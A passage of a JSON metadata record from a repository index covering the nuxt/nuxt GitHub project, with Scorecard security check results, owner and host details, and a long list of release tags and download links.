'3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2F